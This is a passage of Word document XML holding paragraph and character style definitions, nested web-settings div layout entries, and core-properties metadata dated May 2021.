      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="FootnoteTextChar">
    <w:name w:val="Footnote Text Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="FootnoteText"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:rsid w:val="005E0147"/>
    <w:rPr>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="FootnoteReference">
    <w:name w:val="footnote reference"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="005E0147"/>
    <w:rPr>
      <w:vertAlign w:val="superscript"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="FollowedHyperlink">
    <w:name w:val="FollowedHyperlink"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00472010"/>
    <w:rPr>
      <w:color w:val="954F72" w:themeColor="followedHyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Caption">
    <w:name w:val="caption"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:uiPriority w:val="35"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="001B7B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493788">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="1772432038">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="18742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52">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="1313371282">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="1213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316">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="946304193">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="1416128343">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="208420555">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="381565243">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="560796756">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="19829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478">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="1521315949">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="1284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976">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="1350329790">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754">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="391927873">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="6063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062">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="615259770">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="13432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0734">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="101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671">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="494996807">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="4929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900">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="127433575">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="68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6487">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="1400901722">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="1744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login.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4CC7-80A5-A040-986F-15C49930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81</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2021-05-06T16:15:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-05-06T23:03:00Z</dcterms:modified>
</cp:coreProperties>
</file>